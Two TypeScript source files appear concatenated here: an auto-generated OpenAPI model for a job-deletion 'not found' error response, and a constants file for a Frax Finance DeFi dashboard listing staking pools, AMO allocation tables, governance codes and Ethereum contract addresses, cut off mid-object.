* The version of the OpenAPI document: 2021-06-09
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
import { exists, mapValues } from '../runtime';
/**
* Resource not found
* @export
* @interface JobsDeleteJobNotFoundErrorResponseBody
*/
export interface JobsDeleteJobNotFoundErrorResponseBody {
/**
* Message of error
* @type {string}
* @memberof JobsDeleteJobNotFoundErrorResponseBody
*/
message: string;
/**
* The request ID; used when reaching out to support for issues with requests.
* @type {string}
* @memberof JobsDeleteJobNotFoundErrorResponseBody
*/
requestId: string;
}
export function JobsDeleteJobNotFoundErrorResponseBodyFromJSON(json: any): JobsDeleteJobNotFoundErrorResponseBody {
return JobsDeleteJobNotFoundErrorResponseBodyFromJSONTyped(json, false);
}
export function JobsDeleteJobNotFoundErrorResponseBodyFromJSONTyped(json: any, ignoreDiscriminator: boolean): JobsDeleteJobNotFoundErrorResponseBody {
if ((json === undefined) || (json === null)) {
return json;
}
return {
'message': json['message'],
'requestId': json['requestId'],
};
}
export function JobsDeleteJobNotFoundErrorResponseBodyToJSON(value?: JobsDeleteJobNotFoundErrorResponseBody | null): any {
if (value === undefined) {
return undefined;
}
if (value === null) {
return null;
}
return {
'message': value.message,
'requestId': value.requestId,
};
}
constants.ts | const BigNumber = require('bignumber.js');
export const BIG6 = new BigNumber("1e6");
export const BIG12 = new BigNumber("1e12");
export const BIG18 = new BigNumber("1e18");
export const ONE_E18 = 10**18;
// For getPastLogs
export const PAST_LOGS_BATCH_SIZE = 10000;
// FXS contract created in block 11465584
export const LAST_GOOD_FXS_BURNED_SYNC_BLOCK = 12474737; // 12340690
export const LAST_GOOD_LOCKED_STAKES_SYNC_BLOCK = 12731400;
export const LAST_GOOD_LOCKED_VEFXS_SYNC_BLOCK = 12377613; // Contract created at 12377613
export function omit(key, obj) {
const { [key]: omitted, ...rest } = obj;
return rest;
}
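// e.g. omit('a', { a: 1, b: 2 }) -> { b: 2 }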
export type GraphTimeFrame = keyof typeof GraphTimeFramePack;
export const GraphTimeFramePack = {
'All Time': 1576800000,
'1 Year': 31556952,
'6 Months': 15778476,
'3 Months': 7889238,
'1 Month': 2629746,
'1 Week': 604800,
'1 Day': 86400,
'8 Hours': 28800,
'1 Hour': 3600,
'15 Minutes': 900,
}
export const GraphTimeFramePackLowercased = {
'all-time': 1576800000,
'1-year': 31556952,
'6-months': 15778476,
'3-months': 7889238,
'1-month': 2629746,
'1-week': 604800,
'1-day': 86400,
'8-hours': 28800,
'1-hour': 3600,
'15-minutes': 900,
}
export type LockedStakeBucket = keyof typeof LockedStakeBucketPack;
export const LockedStakeBucketPack = {
'Unlocked': { idx: 0, min: 0, max: 1 },
'≤ 15 days': { idx: 1, min: 1, max: 1296000 },
'15 - 30 Days': { idx: 2, min: 1296001, max: 2592000 },
'30 - 60 Days': { idx: 3, min: 2592001, max: 5184000 },
'60 - 90 Days': { idx: 4, min: 5184001, max: 7776000 },
'90 Days - 180 Days': { idx: 5, min: 7776001, max: 15552000 },
'180 Days - 1 Year': { idx: 6, min: 15552001, max: 31536000 },
'1 Year - 2 Years': { idx: 7, min: 31536001, max: 63113904 },
'2 Years - 3 Years': { idx: 8, min: 63113905, max: 94608000 },
'3 Years - 4 Years': { idx: 9, min: 94608001, max: 900000000 }, // includes 9999 day locks
}
export type GraphTimeNumPoints = keyof typeof GraphTimeNumPointsPack;
export const GraphTimeNumPointsPack = {
'all-time': 1095, // Assuming 3 years, each day
'1-year': 365, // One point per day
'6-months': 180, // One point per day
'3-months': 180, // One point per half day
'1-month': 120, // One point per 6 hrs
'1-week': 126, // One point per 2 hrs
'1-day': 96, // One point per 15 min
'8-hours': 96, // One point per 5 min
'1-hour': 120, // One point per 30 sec
'15-minutes': 90, // One point per block (~15 seconds)
}
// Used to limit the number of returned data points so responses are faster
export type GraphTimeModulusPoints = keyof typeof GraphTimeModulusPointsPack;
export const GraphTimeModulusPointsPack = {
'all-time': 20,
'1-year': 10,
'6-months': 10,
'3-months': 5,
'1-month': 4,
'1-week': 3,
'1-day': 2,
'8-hours': 1,
'1-hour': 1,
'15-minutes': 1,
}
export const CollateralDetailsPack = {
'yUSD': {
name: 'LP-yCurve',
dd_name: 'yCRV DAI+USDC+USDT+TUSD',
decimals: 18
},
'USDC': {
name: 'USDC',
dd_name: 'USDC',
decimals: 18
},
'USDT': {
name: 'USDT',
dd_name: 'USDT',
decimals: 18
},
};
export const COLLATERAL_TYPES = Object.keys(CollateralDetailsPack);
export const StakeChoices = {
'Snowball S3F (FRAX + TUSD + USDT)': {
logo: 'snowball',
name: 'Snowball S3F (FRAX + TUSD + USDT)',
label: 'Snowball S3F (FRAX + TUSD + USDT)',
chain: 'avalanche',
external_contract: true,
farming_link: 'https://app.snowball.network/earn_v2/'
},
'SpiritSwap FRAX/FTM': {
logo: 'spiritswap',
name: 'SpiritSwap FRAX/FTM',
label: 'SpiritSwap FRAX/FTM',
chain: 'fantom',
external_contract: true,
farming_link: 'https://app.spiritswap.finance/#/farms'
},
'SpiritSwap FRAX/FXS': {
logo: 'spiritswap',
name: 'SpiritSwap FRAX/FXS',
label: 'SpiritSwap FRAX/FXS',
chain: 'fantom',
external_contract: true,
farming_link: 'https://app.spiritswap.finance/#/farms'
},
// 'PancakeSwap FRAX/FXS': {
// logo: 'pancakeswap',
// slug: "PancakeSwap_FRAX_FXS",
// name: 'PancakeSwap FRAX/FXS',
// label: 'PancakeSwap FRAX/FXS [Deprecated]',
// oracle: 'PANCAKESWAP_FRAX_FXS',
// info_link: 'https://pancakeswap.info/pair/0x444be928a0091affe2be000f3ff904bc51b0172c',
// add_liq_link: 'https://v1exchange.pancakeswap.finance/#/add/0x29ced01c447166958605519f10dcf8b0255fb379/0xde2f075f6f14eb9d96755b24e416a53e736ca363',
// trade_link: 'https://v1exchange.pancakeswap.finance/#/swap?inputCurrency=0x29ced01c447166958605519f10dcf8b0255fb379&outputCurrency=0xde2f075f6f14eb9d96755b24e416a53e736ca363',
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: true,
// token1_symbol: 'CAKE',
// token1_coingecko_ticker: 'pancakeswap-token',
// token1_logo: 'cake',
// chain: 'bsc',
// external_contract: false,
// version: 2
// },
'QuickSwap FRAX/QUICK': {
logo: 'quickswap',
name: 'QuickSwap FRAX/QUICK',
label: 'QuickSwap FRAX/QUICK',
chain: 'polygon',
external_contract: true,
farming_link: 'https://quickswap.exchange/#/quick'
},
'QuickSwap FRAX/FXS': {
logo: 'quickswap',
name: 'QuickSwap FRAX/FXS',
label: 'QuickSwap FRAX/FXS',
chain: 'polygon',
external_contract: true,
farming_link: 'https://quickswap.exchange/#/quick'
},
'Cream FRAX Lending': {
logo: 'cream',
name: 'Cream FRAX Lending',
label: 'Cream FRAX Lending',
chain: 'mainnet',
external_contract: true,
farming_link: 'https://app.cream.finance/'
},
'Yearn crvFRAX Vault (V2)': {
logo: 'yearn',
name: 'Yearn crvFRAX Vault (V2)',
label: 'Yearn crvFRAX Vault (V2)',
chain: 'mainnet',
external_contract: true,
farming_link: 'https://yearn.finance/vaults/0xB4AdA607B9d6b2c9Ee07A275e9616B84AC560139'
},
'Curve FRAX3CRV-f-2': {
logo: 'curve',
slug: "Curve_FRAX3CRV_F_2",
name: 'Curve FRAX3CRV-f-2',
label: 'Curve FRAX3CRV-f V2 (Metapool) [Deprecated, use Curve.fi]',
oracle: 'CURVE_FRAX_DAI_USDC_USDT',
info_link: 'https://curve.fi/frax/stats',
add_liq_link: 'https://curve.fi/frax/deposit',
trade_link: 'https://curve.fi/frax/',
external_contract: true,
farming_link: 'https://curve.fi/pools'
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: false,
// token1_symbol: 'CRV',
// token1_coingecko_ticker: 'curve-dao-token',
// chain: 'mainnet',
// external_contract: false,
// version: 2
},
// 'FinNexus FRAX Lending': {
// logo: 'finnexus',
// name: 'FinNexus FRAX Lending',
// label: 'FinNexus FRAX Lending',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://options.finnexus.io'
// },
// 'SakeSwap FRAX/FXS': {
// logo: 'sakeswap',
// name: 'SakeSwap FRAX/FXS',
// label: 'SakeSwap FRAX/FXS',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://app.sakeswap.finance/#/farm-v2/FXS_FRAXV2_lp'
// },
'Sushi FRAX/FXS [Polygon]': {
logo: 'sushiswap',
name: 'Sushi FRAX/FXS [Polygon]',
label: 'Sushi FRAX/FXS [Polygon]',
chain: 'polygon',
external_contract: true,
farming_link: 'https://app.sushi.com/yield'
},
'Sushi FRAX/USDC [Polygon]': {
logo: 'sushiswap',
name: 'Sushi FRAX/USDC [Polygon]',
label: 'Sushi FRAX/USDC [Polygon]',
chain: 'polygon',
external_contract: true,
farming_link: 'https://app.sushi.com/yield'
},
// 'Sushi FRAX/FXS': {
// logo: 'sushiswap',
// slug: "Sushi_FRAX_FXS",
// name: 'Sushi FRAX/FXS',
// label: 'SushiSwap FRAX/FXS [Deprecated]',
// oracle: 'FRAX_FXS', // Should move to Sushi oracle later?
// info_link: 'https://analytics.sushiswap.fi/pairs/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// add_liq_link: 'https://app.sushiswap.fi/pair/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// trade_link: 'https://app.sushiswap.fi/pair/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: false,
// dual_rewards: true,
// token1_symbol: 'SUSHI',
// token1_coingecko_ticker: 'sushi',
// token1_logo: 'sushi',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
// 'Sushi FXS/WETH': {
// logo: 'sushiswap',
// slug: "Sushi_FXS_WETH",
// name: 'Sushi FXS/WETH',
// label: 'SushiSwap FXS/WETH [Deprecated]',
// oracle: 'FXS_WETH', // Should move to Sushi oracle later?
// info_link: 'https://analytics.sushiswap.fi/pairs/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// add_liq_link: 'https://app.sushiswap.fi/pair/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// trade_link: 'https://app.sushiswap.fi/pair/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: false,
// dual_rewards: true,
// token1_symbol: 'SUSHI',
// token1_coingecko_ticker: 'sushi',
// token1_logo: 'sushi',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
'Uniswap FRAX/USDC': {
logo: 'uniswap',
slug: "Uniswap_FRAX_USDC",
name: 'Uniswap FRAX/USDC',
label: 'Uniswap FRAX/USDC',
oracle: 'FRAX_USDC',
info_link: "https://v2.info.uniswap.org/pair/0x97c4adc5d28a86f9470c70dd91dc6cc2f20d2d4d",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap V3 FRAX/USDC': {
logo: 'uniswap',
slug: "Uniswap_V3_FRAX_USDC",
name: 'Uniswap V3 FRAX/USDC',
label: 'Uniswap V3 FRAX/USDC',
oracle: 'FRAX_USDC',
info_link: "https://info.uniswap.org/#/pools/0xc63b0708e2f7e69cb8a1df0e1389a98c35a76d52",
add_liq_link: 'https://app.uniswap.org/#/add/0x853d955acef822db058eb8505911ed77f175b99e/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48/500',
trade_link: 'https://app.uniswap.org/#/swap?inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1000,
pair_token0_decimals: 18,
pair_token1_decimals: 6
},
'Uniswap FRAX/WETH': {
logo: 'uniswap',
slug: "Uniswap_FRAX_WETH",
name: 'Uniswap FRAX/WETH',
label: 'Uniswap FRAX/WETH',
oracle: 'FRAX_WETH',
info_link: "https://v2.info.uniswap.org/pair/0xfd0a40bc83c5fae4203dec7e5929b446b07d1c76",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/ETH',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=ETH',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap FRAX/FXS': {
logo: 'uniswap',
slug: "Uniswap_FRAX_FXS",
name: 'Uniswap FRAX/FXS',
label: 'Uniswap FRAX/FXS',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0xe1573b9d29e2183b1af0e743dc2754979a40d237",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0/0x853d955acef822db058eb8505911ed77f175b99e',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0&outputCurrency=0x853d955acef822db058eb8505911ed77f175b99e',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap FRAX/IQ': {
logo: 'uniswap',
slug: "Uniswap_FRAX_IQ",
name: 'Uniswap FRAX/IQ',
label: 'Uniswap FRAX/IQ',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0xd6c783b257e662ca949b441a4fcb08a53fc49914",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0x579cea1889991f68acc35ff5c3dd0621ff29b0c9',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0x579cea1889991f68acc35ff5c3dd0621ff29b0c9',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: true,
vefxs_enabled: true,
token1_symbol: 'IQ',
token1_coingecko_ticker: 'everipedia',
token1_logo: 'everipedia',
chain: 'mainnet',
external_contract: false,
version: 3
},
'Uniswap FRAX/OHM': {
logo: 'uniswap',
slug: "Uniswap_FRAX_OHM",
name: 'Uniswap FRAX/OHM',
label: 'Uniswap FRAX/OHM',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0x2dce0dda1c2f98e0f171de8333c3c6fe1bbf4877",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0x383518188c0c6d7730d91b2c03a03c837814a899',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0x383518188c0c6d7730d91b2c03a03c837814a899',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: true,
vefxs_enabled: true,
token1_symbol: 'OHM',
token1_coingecko_ticker: 'olympus',
token1_logo: 'olympus',
token1_decimals: 9,
chain: 'mainnet',
external_contract: false,
version: 4
},
// 'XDEFI XDEX-WETH-FXS-FRAX': {
// logo: 'xdefi',
// name: 'XDEFI XDEX-WETH-FXS-FRAX',
// label: 'XDEFI XDEX-WETH-FXS-FRAX',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://farm.xdefi.com/#/farms/46'
// },
// 'Uniswap FXS/WETH': {
// logo: 'uniswap',
// name: 'Uniswap FXS/WETH',
// label: 'Uniswap FXS/WETH [Deprecated]',
// oracle: 'FXS_WETH',
// info_link: "https://v2.info.uniswap.org/pair/0xecba967d84fcf0405f6b32bc45f4d36bfdbb2e81",
// add_liq_link: 'https://app.uniswap.org/#/add/0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0/ETH',
// trade_link: 'https://app.uniswap.org/#/swap?inputCurrency=0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0&outputCurrency=ETH',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: true,
// dual_rewards: false,
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
// 'Curve FRAX-DAI-USDC-USDT': {
// logo: 'curve',
// name: 'Curve FRAX-DAI-USDC-USDT',
// label: 'Curve FRAX-DAI-USDC-USDT V1 [Deprecated]',
// oracle: 'CURVE_FRAX_DAI_USDC_USDT',
// info_link: 'https://crv.finance/',
// add_liq_link: 'https://crv.to/pool',
// trade_link: 'https://crv.to/swap',
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: false,
// token1_symbol: 'CRV',
// token1_coingecko_ticker: 'curve-dao-token',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
};
export const GovernanceHistoryCodes = {
"Created": 0,
"Active": 1,
"Rejected": 2,
"Succeeded": 3,
"Queued": 4,
"Executed": 5
}
export const govHistStringFromCode = (code: number) => {
const theKeys = Object.keys(GovernanceHistoryCodes);
for (let i = 0; i < theKeys.length; i++){
const key = theKeys[i];
if (GovernanceHistoryCodes[key] == code) return key;
}
return null;
}
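// e.g. govHistStringFromCode(3) -> "Succeeded"; unknown codes return null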
export const INVESTOR_ALLOCATIONS = {
'Investor_V1': [
{ title: "Unallocated", big_base: BIG6, symbol: 'USDC' },
{ title: "yearn", big_base: BIG6, symbol: 'USDC' },
{ title: "AAVE", big_base: BIG6, symbol: 'USDC' },
{ title: "Compound", big_base: BIG6, symbol: 'USDC' },
{ title: "Total", big_base: BIG6, symbol: 'USDC' }
],
'Investor_V2': [
{ title: "Unallocated", big_base: BIG6, symbol: 'USDC' },
{ title: "yearn", big_base: BIG6, symbol: 'USDC' },
{ title: "AAVE", big_base: BIG6, symbol: 'USDC' },
{ title: "Compound", big_base: BIG6, symbol: 'USDC' },
{ title: "Total", big_base: BIG6, symbol: 'USDC' }
],
'LendingAMO_V1': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "crFRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Staked FPT-FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free FPT-FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Unwinding CFNX", big_base: BIG18, symbol: 'CFNX' },
{ title: "Claimable Unwound FNX", big_base: BIG18, symbol: 'FNX' },
{ title: "Free FNX", big_base: BIG18, symbol: 'FNX' },
{ title: "FNX Total", big_base: BIG18, symbol: 'FNX' },
{ title: "FRAX Total", big_base: BIG18, symbol: 'FRAX' },
{ title: "CollatDollarBalance", big_base: BIG18, symbol: 'USD' },
],
'CurveAMO_V1': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
],
'CurveAMO_V2': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV-2-f in Gauge", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f lent to Voter", big_base: BIG18, symbol: 'FRAX3CRV' },
],
'CurveAMO_V3': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'CurveAMO_V4': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'StakeDAO_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'OHM_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "OHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "sOHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "Bonded OHM Value", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total USD Value", big_base: BIG18, symbol: 'FRAX' },
],
'Convex_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
};
export const INVESTOR_REWARDS = {
'Investor_V1': [
{ title: "COMP", big_base: BIG18, symbol: 'COMP' }
],
'Investor_V2': [
{ title: "COMP", big_base: BIG18, symbol: 'COMP' },
{ title: "stkAAVE", big_base: BIG18, symbol: 'stkAAVE' },
{ title: "AAVE", big_base: BIG18, symbol: 'AAVE' }
],
'LendingAMO_V1': [
{ title: "FNX", big_base: BIG18, symbol: 'FNX' }
],
'CurveAMO_V1': [
{ title: "CRV", big_base: BIG18, symbol: 'CRV' }
],
'Convex_AMO': [
// { title: "CRV in contract", big_base: BIG18, symbol: 'CRV' },
{ title: "CRV claimable", big_base: BIG18, symbol: 'CRV' },
// { title: "CVX in contract", big_base: BIG18, symbol: 'CVX' },
{ title: "CVX claimable", big_base: BIG18, symbol: 'CVX' },
// { title: "cvxCRV in contract", big_base: BIG18, symbol: 'cvxCRV' },
{ title: "cvxCRV claimable", big_base: BIG18, symbol: 'cvxCRV' },
// { title: "FXS in contract", big_base: BIG18, symbol: 'FXS' },
{ title: "FXS claimable", big_base: BIG18, symbol: 'FXS' },
]
};
export const CONTRACT_ADDRESSES = {
mainnet: {
main: {
FRAX: '0x853d955aCEf822Db058eb8505911ED77F175b99e',
FXS: '0x3432B6A60D23Ca0dFCa7761B7ab56459D9C964D0',
FXB: '',
vesting: 'NOT_DEPLOYED_YET',
veFXS: '0xc8418aF6358FFddA74e09Ca9CC3Fe03Ca6aDC5b0', // Old: '0xcb75A1655c84589652D0f3A4605e5dDA8431F0a6'
veFXS_whitelist_checker: ''
},
weth: '0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2',
oracles: {
FRAX_WETH: '0x9b1A56A2E7164c43384448d82253781c1318A77E', // V1: 0xD18660Ab8d4eF5bE062652133fe4348e0cB996DA
// FRAX_USDC: '0x2E45C589A9F301A2061f6567B9F432690368E3C6', // V1: 0x2AD064cEBA948A2B062ba9AfF91c98B9F0a1f608
// FRAX_FXS: '0x4b85bD29f71b364ae6183C9721Ae5f596E7Bfd3d', // V1: 0xD0435BF68dF2B516C6382caE8847Ab5cdC5c3Ea7
FXS_WETH: '0x3B11DA52030420c663d263Ad4415a8A02E5f8cf8', // V1: '0x9e483C76D7a66F7E1feeBEAb54c349Df2F00eBdE'
// FXS_USDC: '0x1F70Af31D041f9C183E23EC6809c04eb8CA006a4', //V1: 0x28fdA30a6Cf71d5fC7Ce17D6d20c788D98Ff2c46
USDC_WETH: '0x69B9E922ecA72Cda644a8e32B8427000059388c6', // V1: '0x5e48C34f1005a514DaF0E1aEc53Dbb70fdC2C9F9'
FRAX_USDC: '0x2E45C589A9F301A2061f6567B9F432690368E3C6', // V1: 0x2AD064cEBA948A2B062ba9AfF91c98B9F0a1f608
},
oracles_other: {
FRAX_FXS: '0x4b85bD29f71b364ae6183C9721Ae5f596E7Bfd3d', // V1: 0xD0435BF68dF2B516C6382caE8847Ab5cdC5c3Ea7
FXS_USDC: '0x1F70Af31D041f9C183E23EC6809c04eb8CA006a4', //V1: 0x28fdA30a6Cf71d5fC7Ce17D6d20c788D98Ff2c46
FXS_USDC_PAIR: '0x9BAC32D4f3322bC7588BB119283bAd7073145355'
},
pid_related: {
pid_controller: "0x6de667F424E2b1b8fD39fC2e1b9a14c0103E9879", // V1: "0x60A315E04419290449dB4866481cb33d39df03A3",
reserve_tracker: "0x7215F84FE2f2F1726fFb42da923f3F04A72CF5E8" // V1: "0xF96882Dd0a4c8b2469084d2Db48768AA83B4a2f5"
},
investments: {
"yearn_yUSDC_V2": '0x5f18C75AbDAe578b483E5F43f12a39cF75b973a9',
"aave_aUSDC_Pool": '0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9',
"aave_aUSDC_Token": '0xBcca60bB61934080951369a648Fb03DF4F96263C',
'aave_incentives_controller': '0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5',
"compound_cUSDC": '0x39AA39c021dfbaE8faC545936693aC917d5E7563',
"compound_controller": '0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B',
"cream_crFRAX": '0xb092b4601850E23903A42EaCBc9D8A0EeC26A4d5',
"fnx_FPT_FRAX": '0x39ad661bA8a7C9D3A7E4808fb9f9D5223E22F763',
"fnx_FPT_B": '0x7E605Fb638983A448096D82fFD2958ba012F30Cd', // B = FNX
'fnx_IntegratedStake': '0x23e54F9bBe26eD55F93F19541bC30AAc2D5569b2',
'fnx_MinePool': '0x4e6005396F80a737cE80d50B2162C0a7296c9620',
'fnx_TokenConverter': '0x955282b82440F8F69E901380BeF2b603Fba96F3b',
'fnx_ManagerProxy': '0xa2904Fd151C9d9D634dFA8ECd856E6B9517F9785',
'fnx_CFNX': '0x9d7beb4265817a4923FAD9Ca9EF8af138499615d',
// "bzx_iUSDC_Fulcrum": '0x32e4c68b3a4a813b710595aeba7f6b7604ab9c15',
// "keeper_Pool_V2": '0x53463cd0b074E5FDafc55DcE7B1C82ADF1a43B2E',
